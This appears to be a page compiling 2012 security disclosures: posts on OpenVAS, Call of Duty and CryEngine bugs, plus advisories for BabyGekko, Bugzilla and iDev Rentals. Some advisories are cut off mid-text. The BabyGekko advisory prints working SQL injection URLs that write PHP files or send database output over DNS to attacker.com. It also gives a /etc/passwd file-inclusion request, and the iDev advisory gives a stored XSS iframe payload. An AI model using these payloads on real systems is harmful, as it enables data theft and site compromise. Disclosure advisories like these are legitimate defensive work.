0-day vulnerabilities in Call of Duty MW3 and CryEngine 3
Following our presentation at POC2012 [1] conference, we have released: a paper [2] regarding a NULL pointer dereference vulnerability affecting Call of Duty: Modern Warfare 3 [3], and a video [4] demonstrating a remote code execution vulnerability affecting CryEngine 3 [5]. [1] http://powerofcommunity.net [2] http://revuln.com/files/ReVuln_CoDMW3_null_pointer_dereference.pdf [3] http://www.callofduty.com/mw3 [4] http://vimeo.com/53425372 [5] http://www.crytek.com/cryengine/cryengine3 --- ReVuln http://revuln.com http://twitter.com/revuln
Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection
Hello Tim, thank you for the heads up and notification. The versions of openvas-manager package, as shipped with Fedora release of 16 and release of 17 is based on upstream 2.0.5 version yet. From what I have looked and can tell from upstream advisory and patch (for 3.0.X version): [1] http://www.openvas.org/OVSA20121112.html [2] http://wald.intevation.org/scm/viewvc.php?view=revroot=openvasrevision=14437 the CVE-2012-5520 does not seem to be applicable to OpenVAS-4 / openvas-manager 2.0.5 version yet: [3] http://lists.wald.intevation.org/pipermail/openvas-announce/2012-August/000140.html But prior definitely classifying Fedora 16 and Fedora 17 openvas-manager package versions as not vulnerable to this issue, I would like to hear opinion / confirmation from someone more familiar with OpenVAS code. So could you confirm the CVE-2012-5520 wouldn't affect OpenVAS-4 2.0.X version (yet)? Thank you Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team - Original Message - Doh, a document gets proof read by multiple people and yet it contains a mistake. In the Current Status section of the advisory, the date is incorrect. A corrected advisory is attached. Tim -- Tim Brown mailto:timb@openvas,org http://www.openvas.org/
Multiple vulnerabilities in BabyGekko
Advisory ID: HTB23122 Product: BabyGekko Vendor: babygekko.com Vulnerable Version(s): 1.2.2e and probably prior Tested Version: 1.2.2e Vendor Notification: October 24, 2012 Vendor Patch: November 4, 2012 Public Disclosure: November 14, 2012 Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98], Cross-Site Scripting [CWE-79] CVE References: CVE-2012-5698, CVE-2012-5699, CVE-2012-5700 CVSSv2 Base Scores: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Risk Level: High Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BabyGekko, which can be exploited to include local PHP files, perform SQL Injection and Cross-Site Scripting (XSS) attacks. 1) Multiple SQL Injections in BabyGekko Two SQL injections exist in BabyGekko administrator's panel but their exploitation demands administrator's privileges. However they can also be exploited by a non-authenticated malicious user via CSRF vector, because /admin/index.php script is also vulnerable to CSRF attack. In order to do so he has to make logged-in administrator visit a malicious page. 1.1 The vulnerability exists due to insufficient validation of input passed via the keyword parameter to /admin/index.php (when app is set to users). A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. The following PoC (Proof-of-Concept) will create (depending on web server and database permissions) a file /tmp/.class.php and writes lt;?phpinfo()?gt; into it: http://[host]/admin/index.php?app=usersajax=1action=searchkeyword=1%27%29%20UNION%20SELECT%201,2,3,4,5,6,7,8,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of .attacker.com, located on attacker controlled DNS server: http://[host]/admin/index.php?app=usersajax=1action=searchkeyword=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- 1.2 The vulnerability exists due to insufficient validation of input passed via the query parameter to /admin/index.php. A remote authenticated administrator can manipulate SQL queries and execute arbitrary SQL commands within application's database. The following PoC will create (depending on web server and database permissions) a file /tmp/.class.php and writes lt;?phpinfo()?gt; into it: http://[host]/admin/index.php?app=htmlaction=getlistofusersquery=1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,%27%3C?%20phpinfo%28%29;%20?%3E%27%20INTO%20OUTFILE%20%27/tmp/.class.php%27%20--%202%20 The second PoC code below is based on DNS Exfiltration technique and may be used in cases when application's database is hosted on a Windows system. The PoC sends a DNS request to resolve an IP address for the `version()` (or any other sensitive output from the database) subdomain of .attacker.com, located on attacker controlled DNS server: http://[host]/admin/index.php?app=htmlaction=getlistofusersquery=%27 OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 -- 2) Local File Inclusion in BabyGekko The vulnerability exists due to insufficient validation of input passed via the app parameter to index.php. A remote attacker can include arbitrary files from local system using directory traversal sequences with NULL byte. The following PoC will show the /etc/passwd file: http://[host]/index.php?app=../../../../../../../etc/passwd%00 Second PoC demonstrates inclusion of /tmp/.class.php file created during exploitation of vulnerabilities 1.1 or 1.2. Depending on server configuration and permissions it will show the results of phpinfo() function execution: http://[host]/index.php?app=../../../../../../../tmp/ 3) Multiple Cross-Site Scripting (XSS) in BabyGekko 3.1 Input passed via the id parameter to /admin/index.php is not properly sanitized. A remote attacker can execute arbitrary HTML and script code in administrator's browser in context of vulnerable website.
Security advisory for Bugzilla 4.4rc1, 4.2.4, 4.0.9 and 3.6.12
Summary === Bugzilla is a Web-based bug-tracking system used by a large number of software projects. The following security issues have been discovered in Bugzilla: * Confidential product and component names can be disclosed to unauthorized users if they are used to control the visibility of a custom field. * When calling the 'User.get' WebService method with a 'groups' argument, it is possible to check if the given group names exist or not. * Due to incorrectly filtered field values in tabular reports, it is possible to inject code which can lead to XSS. * When trying to mark an attachment in a bug you cannot see as obsolete, the description of the attachment is disclosed in the error message. * A vulnerability in swfstore.swf from YUI2 can lead to XSS. All affected installations are encouraged to upgrade as soon as possible. Vulnerability Details = Class: Information Leak Versions:3.3.4 to 3.6.11, 3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3 Fixed In:3.6.12, 4.0.9, 4.2.4, 4.4rc1 Description: If the visibility of a custom field is controlled by a product or a component of a product you cannot see, their names are disclosed in the JavaScript code generated for this custom field despite they should remain confidential. References: https://bugzilla.mozilla.org/show_bug.cgi?id=731178 CVE Number: CVE-2012-4199 Class: Information Leak Versions:3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3 Fixed In:4.0.9, 4.2.4, 4.4rc1 Description: Calling the User.get method with a 'groups' argument leaks the existence of the groups depending on whether an error is thrown or not. This method now also throws an error if the user calling this method does not belong to these groups (independently of whether the groups exist or not). References: https://bugzilla.mozilla.org/show_bug.cgi?id=781850 CVE Number: CVE-2012-4198 Class: Cross-Site Scripting Versions:4.1.1 to 4.2.3, 4.3.1 to 4.3.3 Fixed In:4.2.4, 4.4rc1 Description: Due to incorrectly filtered field values in tabular reports, it is possible to inject code leading to XSS. References: https://bugzilla.mozilla.org/show_bug.cgi?id=790296 CVE Number: CVE-2012-4189 Class: Information Leak Versions:2.16 to 3.6.11, 3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3 Fixed In:3.6.12, 4.0.9, 4.2.4, 4.4rc1 Description: Trying to mark an attachment in a bug you cannot see as obsolete discloses its description in the error message. The description of the attachment is now removed from the error message. References: https://bugzilla.mozilla.org/show_bug.cgi?id=802204 CVE Number: CVE-2012-4197 Class: Cross-Site Scripting Versions:3.7.1 to 4.0.8, 4.1.1 to 4.2.3, 4.3.1 to 4.3.3 Fixed In:4.0.9, 4.2.4, 4.4rc1 Description: A vulnerability in swfstore.swf from YUI2 allows JavaScript injection exploits to be created against domains that host this affected YUI .swf file. References: https://bugzilla.mozilla.org/show_bug.cgi?id=808845 http://yuilibrary.com/support/20121030-vulnerability/ CVE Number: CVE-2012-5475 Vulnerability Solutions === The fixes for these issues are included in the 3.6.12, 4.0.9, 4.2.4 and 4.4rc1 releases. Upgrading to a release with the relevant fixes will protect your installation from possible exploits of these issues. If you are unable to upgrade but would like to patch just the individual security vulnerabilities, there are patches available for each issue at the References URL for each vulnerability. Full release downloads, patches to upgrade Bugzilla from previous versions, and CVS/bzr upgrade instructions are available at: http://www.bugzilla.org/download/ Credits === The Bugzilla team wish to thank the following people/organizations for their assistance in locating, advising us of, and assisting us to fix this issue: Frédéric Buclin David Lawrence Gervase Markham Mateusz Goik General information about the Bugzilla bug-tracking system can be found at: http://www.bugzilla.org/ Comments and follow-ups can be directed to the mozilla.support.bugzilla newsgroup or the support-bugzilla mailing list. http://www.bugzilla.org/support/ has directions for accessing these forums.
iDev Rentals v1.0 - Multiple Web Vulnerabilities
Title: == iDev Rentals v1.0 - Multiple Web Vulnerabilities Date: = 2012-11-14 References: === http://www.vulnerability-lab.com/get_content.php?id=760 VL-ID: = 758 Common Vulnerability Scoring System: 3.5 Introduction: = idev-Rentals is a PHP Script (special software for your website) allows you to create an apartment / housing / accommodation rentals listing directory. You and your website visitors can add property rentals, upload photos, add property location information that will display visually on a Google Map embedded plugin. You can choose to charge for listings, or make your rentals directory entire free for visitors to post their rental listings to. idev-Rentals allows you to service either a broad or highly targeted region. You can create a worldwide rentals directory or a rentals directory limited to a specific city or region. You can customize the appearance entirely, add your own graphics, logo, colors, header/footer, and fully integrate idev-Rentals in to your website! More theme style templates are available from our demo page. When you purchase idev-Rentals, we will deliver (electronically) to you the files that you will then need to upload to your website in order to run idev-Rentals There is a simple installation process (that we fully support) (and we also offer a complete installation service, if you need that kind of help) the entire process can completed in as little as 5 minutes. You will have full access to an administrative control panel area where you will be able to manage all idev-Rentals functions easily and without any technical knowledge. All of our website software (PHP Scripts) are designed to be customized fully. We include a good selection of pre-made professional theme style templates free with purchase (and we are constantly expanding upon our template library). You will have the option to create your own theme style templates (feel free to share them with the community!) and if you are a programmer/advanced developer, you will also have full access to our source code, which means that you can literally change anything or add any features that you might need. Create an Open Rentals Directory Website As a business startup idea, you could be the first in your area to offer a rentals listings website which is open to visitors to submit their own rental listings. This can be a wonderful money earning business startup idea since you could then place advertising, or charge for listings on your website. (Copy of the Vendor Homepage: http://idevspot.com/idev-rentals.php ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the idev Rentals v1.0 php rental script. Report-Timeline: 2012-11-14: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in idev-Rentals 1.0 php rental script. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the add listing, add category and add package module with the bound vulnerable Title, Caption Description, Location, Category name, package Name and Package Description parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged web application user account. Vulnerable Module(s): [+] Add Listing [+] Add Category [+] Add Package Vulnerable Parameter(s): [+] [Title][Caption][Description] [Location] [+] [Category name] [+] [Package Name] - [Package Description] Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attackers with low or medium privileged application user account and with low or medium required user inter action. For demonstration or reproduce ... 1.2.1 The remote attacker can add standard listing to inject own malicious persistent script code, iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in the fields Title, Caption, Description, Location When a admin is processing to view the users listing, the malicious script code will be executed. URL: http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/index.php?page=account_add 1.2.2 The remote attacker can add category to inject own malicious persistent script code, iframe src=http://www.vulnerability-lab.com onload=alert(VL)/iframe, in the fields category name. When a user is processing to view the category listing, the malicious script code
Re: Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection
Hello Jan, in version 2.0.5 the discussed vulnerable like looks like this: command = g_strdup_printf (/bin/sh %s %s %s 2 /dev/null, script, xml_file, output_file); So there is not IP and PORT to be sanitized so 2.0.5 is probably on the safe side of this vulnerability. If you deem it safer we can bump to current 3.0.x version - I know it is usually nono, but there should be no casualties, since I sincerely doubt there are _ANY_ openvas users on Fedora distribution (16/17) as half of the openvas suite packages is still under review. Mainly the openvas suite doesn't work on current Fedora due to incompatibility between openvas network stack (openvas-libraries) and the gnutls library we have in Fedora. Best regards Michal Ambroz (one of Fedora openvas-* packagers) Původní zpráva Od: Jan Lieskovsky jlies...@redhat.com Předmět: Re: [oss-security] Re: [OVSA20121112] OpenVAS Manager Vulnerable To Command Injection Datum: 14.11.2012 11:55:09 Hello Tim, thank you for the heads up and notification. The versions of openvas-manager package, as shipped with Fedora release of 16 and release of 17 is based on upstream 2.0.5 version yet. From what I have looked and can tell from upstream advisory and patch (for 3.0.X version): [1] http://www.openvas.org/OVSA20121112.html [2] http://wald.intevation.org/scm/viewvc.php?view=revroot=openvasrevision=14437 the CVE-2012-5520 does not seem to be applicable to OpenVAS-4 / openvas-manager 2.0.5 version yet: [3] http://lists.wald.intevation.org/pipermail/openvas-announce/2012-August/000140.html But prior definitely classifying Fedora 16 and Fedora 17 openvas-manager package versions as not vulnerable to this issue, I would like to hear opinion / confirmation from someone more familiar with OpenVAS code. So could you confirm the CVE-2012-5520 wouldn't affect OpenVAS-4 2.0.X version (yet)? Thank you Regards, Jan. -- Jan iankko Lieskovsky / Red Hat Security Response Team - Original Message - Doh, a document gets proof read by multiple people and yet it contains a mistake. In the Current Status section of the advisory, the date is incorrect. A corrected advisory is attached. Tim -- Tim Brown mailto:timb@openvas,org http://www.openvas.org/
